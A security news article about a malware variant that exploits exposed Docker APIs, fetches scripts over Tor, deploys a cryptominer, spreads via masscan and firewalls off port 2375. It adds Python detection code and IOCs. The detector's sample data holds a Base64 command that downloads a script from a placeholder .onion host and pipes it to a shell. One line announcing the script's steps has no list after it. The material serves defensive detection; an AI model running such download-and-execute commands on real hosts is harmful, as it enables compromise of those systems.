Initially reported in June 2025 by Trend Micro’s Threat Intelligence Team as a Tor-enabled cryptominer dropper, this variant, observed in Akamai Hunt honeypots in August 2025, expands infection capabilities by leveraging host filesystem mounts, automated firewall lockdowns, and a sophisticated Go-based dropper that orchestrates further propagation.
The initial June 2025 strain exploited exposed Docker API ports (2375) to launch an alpine:latest container, mount the host root filesystem, and execute a Base64-encoded shell script fetched from a Tor .onion server.
That downloader installed curl and tor, routed its requests through socks5h://localhost:9050, and ultimately deployed an XMRig cryptominer packed in a Zstandard-compressed binary fetched via a second Tor endpoint.
Persistence was achieved by modifying SSH configurations for root login and establishing a cron job for stealthy beaconing.
The Akamai Hunt Team has now identified a variant that diverges significantly. Instead of dropping only a cryptominer, this iteration delivers a multi-tool payload including masscan, libpcap, torsocks, and custom infection capabilities while aggressively denying access by blocking port 2375 at the host level.
Automated firewall rules are inserted via cron to reject incoming TCP traffic on the Docker API port using whichever utility (firewall-cmd, ufw, pfctl, iptables, or nft) is available.
This “superiority” tactic prevents other attackers from leveraging the same host, effectively reserving the compromised instance for the threat actor’s exclusive use.
Upon container creation, the Base64 payload installs prerequisites and fetches docker-init.sh from a Tor address. The script:
The Go dropper parses the utmp file to identify active sessions, executes masscan scans for port 2375, and, upon discovery, initiates the same container-creation exploit on new targets.
While the binary includes unused logic for Telnet (port 23) and Chromium remote debugging (port 9222) infection techniques, these branches remain dormant pending future enhancements.
Indicators of compromise include unusual container deployments with host bind mounts, Base64-encoded commands invoking tor and curl, cron entries for firewall utilities blocking port 2375, and outbound Tor connections to known .onion domains.
Defenders should closely monitor access to the Docker API port (2375) as well as Telnet (23) and Chromium remote debugging (9222); flag newly created containers that immediately install curl, tor, or masscan; inspect crontabs for repeated firewall-rule deployments; and block unauthorized Tor traffic.
Restricting Docker API exposure, enforcing network segmentation, rotating default credentials, and locking down remote debugging ports are critical to mitigate this advanced infection vector.
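The following detection logic is an added example, not code from Akamai or the original report: it checks a container record shaped like `docker inspect` output for the traits described above (host root bind mount, Base64-encoded command, curl/tor/masscan installation, .onion URL) and scans crontab text for firewall utilities blocking port 2375. The sample container, crontab lines, and the `placeholder.onion` name are constructed for the demonstration.

```python
import base64
import re

FIREWALL_TOOLS = ("firewall-cmd", "ufw", "pfctl", "iptables", "nft")
SUSPECT_TOOLS = ("curl", "tor", "masscan", "torsocks")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Constructed stand-in for a `docker inspect` record of the container the article
# describes: alpine:latest, host root bind-mounted, a Base64 command that installs
# curl and tor. The encoded script and the .onion name are harmless placeholders.
_SCRIPT = b"apk add curl tor; curl --socks5-hostname localhost:9050 http://placeholder.onion/docker-init.sh"
SAMPLE_CONTAINER = {
    "Config": {"Image": "alpine:latest",
               "Cmd": ["sh", "-c", "echo %s | base64 -d | sh" % base64.b64encode(_SCRIPT).decode()]},
    "HostConfig": {"Binds": ["/:/hostroot"]},
}

# Constructed crontab: one benign line, one matching the article's port-2375 lockdown.
SAMPLE_CRONTAB = """0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * iptables -I INPUT -p tcp --dport 2375 -j DROP
"""

def flag_container(inspect: dict) -> list:
    """Return findings for one container record (host root mount, Base64, tools, .onion)."""
    findings = []
    binds = inspect.get("HostConfig", {}).get("Binds") or []
    if any(b.startswith("/:") for b in binds):
        findings.append("host root bind mount: " + ", ".join(binds))
    cmd = " ".join(inspect.get("Config", {}).get("Cmd") or [])
    # Decode Base64 blobs so tool names hidden inside them become searchable,
    # then drop the blobs themselves so random Base64 text cannot produce false hits.
    decoded = ""
    for blob in B64_BLOB.findall(cmd):
        try:
            decoded += base64.b64decode(blob).decode("utf-8", "ignore")
        except Exception:
            pass  # not valid Base64; ignore
    if decoded:
        findings.append("base64-encoded command")
    text = B64_BLOB.sub(" ", cmd) + " " + decoded
    tools = sorted(t for t in SUSPECT_TOOLS if re.search(r"\b%s\b" % t, text))
    if tools:
        findings.append("installs/invokes " + ", ".join(tools))
    if ".onion" in text:
        findings.append("Tor .onion URL")
    return findings

def flag_crontab(text: str) -> list:
    """Return cron lines that call a firewall utility and mention port 2375."""
    return [line for line in text.splitlines()
            if not line.startswith("#") and "2375" in line
            and any(re.search(r"\b%s\b" % t, line) for t in FIREWALL_TOOLS)]
```

Run `flag_container` over each record from `docker inspect $(docker ps -q)` and `flag_crontab` over the host's crontab files; a benign container or crontab returns an empty list.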
Continuous threat hunting platforms like Akamai Hunt can detect these subtle anomalies and thwart lateral propagation before a complex botnet emerges.
| IOC | Type |
|---|---|
| wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion | Domain |
| 2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion | Domain |
| webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207 | URL |
| C38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c – docker-init.sh | Hash |
| 649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 – system | Hash |
The post New Malware Exploits Exposed Docker APIs to Deploy Cryptominer and Hide via Tor appeared first on Cyber Security News.